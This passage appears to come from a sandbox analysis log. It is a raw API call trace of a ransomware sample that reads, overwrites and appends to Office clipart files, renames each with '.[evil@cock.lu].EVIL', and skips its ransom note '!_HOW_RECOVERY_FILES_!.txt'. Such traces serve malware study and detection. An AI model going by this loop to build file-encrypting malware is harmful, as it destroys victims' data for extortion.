dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.519] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x62b6, lpOverlapped=0x0) returned 1 [0169.527] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.528] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.528] _errno () returned 0x84b1160840 [0169.528] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.528] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x62c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x62c0, lpOverlapped=0x0) returned 1 [0169.528] CloseHandle (hObject=0x1a8) returned 1 [0169.528] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.528] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.528] __uncaught_exception () returned 0x84b1160800 [0169.528] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.529] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00683_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00683_.wmf.[evil@cock.lu].evil")) returned 1 [0169.530] ??_V@YAXPEAX@Z () returned 0x1 [0169.534] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF", dwFileAttributes=0x200) returned 0 [0169.534] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.534] wcsstr (_Str="SO00694_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.534] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF") returned 69 [0169.534] wcscmp (_String1="SO00694_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.534] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00694_.WMF") returned 0x0 [0169.534] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF") returned 0x45 [0169.534] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00694_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.537] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6302, lpOverlapped=0x0) returned 1 [0169.544] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.544] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.544] _errno () returned 0x84b1160840 [0169.544] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.544] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x6320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6320, lpOverlapped=0x0) returned 1 [0169.545] CloseHandle (hObject=0x1a8) returned 1 [0169.545] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.545] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.545] __uncaught_exception () returned 0x84b1160800 [0169.545] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.546] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00694_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00694_.wmf.[evil@cock.lu].evil")) returned 1 [0169.547] ??_V@YAXPEAX@Z () returned 0x1 [0169.549] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF", dwFileAttributes=0x200) returned 0 [0169.550] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.550] wcsstr (_Str="SO00704_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.550] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF") returned 69 [0169.550] wcscmp (_String1="SO00704_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.550] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00704_.WMF") returned 0x0 [0169.550] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF") returned 0x45 [0169.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00704_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.552] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3636, lpOverlapped=0x0) returned 1 [0169.558] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.558] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.558] _errno () returned 0x84b1160840 [0169.559] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.559] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x3640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3640, lpOverlapped=0x0) returned 1 [0169.559] CloseHandle (hObject=0x1a8) returned 1 [0169.559] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.559] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.559] __uncaught_exception () returned 0x84b1160800 [0169.559] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.559] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00704_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00704_.wmf.[evil@cock.lu].evil")) returned 1 [0169.560] ??_V@YAXPEAX@Z () returned 0x1 [0169.563] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF", dwFileAttributes=0x200) returned 0 [0169.563] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.563] wcsstr (_Str="SO00726_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.563] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF") returned 69 [0169.563] wcscmp (_String1="SO00726_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.563] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00726_.WMF") returned 0x0 [0169.563] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF") returned 0x45 [0169.563] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00726_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.565] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16478, lpOverlapped=0x0) returned 1 [0169.573] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.573] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.573] _errno () returned 0x84b1160840 [0169.573] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.573] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x16480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16480, lpOverlapped=0x0) returned 1 [0169.573] CloseHandle (hObject=0x1a8) returned 1 [0169.573] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.573] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.573] __uncaught_exception () returned 0x84b1160800 [0169.574] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.574] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00726_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00726_.wmf.[evil@cock.lu].evil")) returned 1 [0169.575] ??_V@YAXPEAX@Z () returned 0x1 [0169.578] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF", dwFileAttributes=0x200) returned 0 [0169.578] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.578] wcsstr (_Str="SO00728_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.578] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF") returned 69 [0169.579] wcscmp (_String1="SO00728_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.579] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00728_.WMF") returned 0x0 [0169.579] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF") returned 0x45 [0169.579] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00728_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.582] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1758, lpOverlapped=0x0) returned 1 [0169.610] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.610] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.610] _errno () returned 0x84b1160840 [0169.611] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.611] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1760, lpOverlapped=0x0) returned 1 [0169.611] CloseHandle (hObject=0x1a8) returned 1 [0169.611] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.611] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.611] __uncaught_exception () returned 0x84b1160800 [0169.611] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.612] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00728_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00728_.wmf.[evil@cock.lu].evil")) returned 1 [0169.613] ??_V@YAXPEAX@Z () returned 0x1 [0169.616] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF", dwFileAttributes=0x200) returned 0 [0169.616] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.616] wcsstr (_Str="SO00732_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.616] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF") returned 69 [0169.616] wcscmp (_String1="SO00732_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.617] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00732_.WMF") returned 0x0 [0169.617] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF") returned 0x45 [0169.617] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00732_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.619] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13fc, lpOverlapped=0x0) returned 1 [0169.628] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.628] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.628] _errno () returned 0x84b1160840 [0169.628] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.628] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1400, lpOverlapped=0x0) returned 1 [0169.628] CloseHandle (hObject=0x1a8) returned 1 [0169.629] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.629] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.629] __uncaught_exception () returned 0x84b1160800 [0169.629] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.629] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00732_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00732_.wmf.[evil@cock.lu].evil")) returned 1 [0169.631] ??_V@YAXPEAX@Z () returned 0x1 [0169.634] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF", dwFileAttributes=0x200) returned 0 [0169.634] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.634] wcsstr (_Str="SO00734_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.634] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF") returned 69 [0169.634] wcscmp (_String1="SO00734_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.634] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00734_.WMF") returned 0x0 [0169.634] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF") returned 0x45 [0169.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00734_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.637] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x660, lpOverlapped=0x0) returned 1 [0169.676] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.676] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.676] _errno () returned 0x84b1160840 [0169.676] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.676] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x680, lpOverlapped=0x0) returned 1 [0169.677] CloseHandle (hObject=0x1a8) returned 1 [0169.677] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.677] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.677] __uncaught_exception () returned 0x84b1160800 [0169.677] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.678] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00734_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00734_.wmf.[evil@cock.lu].evil")) returned 1 [0169.679] ??_V@YAXPEAX@Z () returned 0x1 [0169.682] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF", dwFileAttributes=0x200) returned 0 [0169.683] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.683] wcsstr (_Str="SO00735_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.683] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF") returned 69 [0169.683] wcscmp (_String1="SO00735_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.683] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00735_.WMF") returned 0x0 [0169.683] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF") returned 0x45 [0169.683] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00735_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.686] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5cc, lpOverlapped=0x0) returned 1 [0169.695] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.695] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.695] _errno () returned 0x84b1160840 [0169.695] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.695] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5e0, lpOverlapped=0x0) returned 1 [0169.696] CloseHandle (hObject=0x1a8) returned 1 [0169.696] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.696] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.696] __uncaught_exception () returned 0x84b1160800 [0169.696] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.696] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00735_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00735_.wmf.[evil@cock.lu].evil")) returned 1 [0169.698] ??_V@YAXPEAX@Z () returned 0x1 [0169.702] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF", dwFileAttributes=0x200) returned 0 [0169.702] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.702] wcsstr (_Str="SO00736_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.702] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF") returned 69 [0169.702] wcscmp (_String1="SO00736_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.702] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00736_.WMF") returned 0x0 [0169.702] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF") returned 0x45 [0169.702] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00736_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.705] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x184c, lpOverlapped=0x0) returned 1 [0169.715] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.715] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.715] _errno () returned 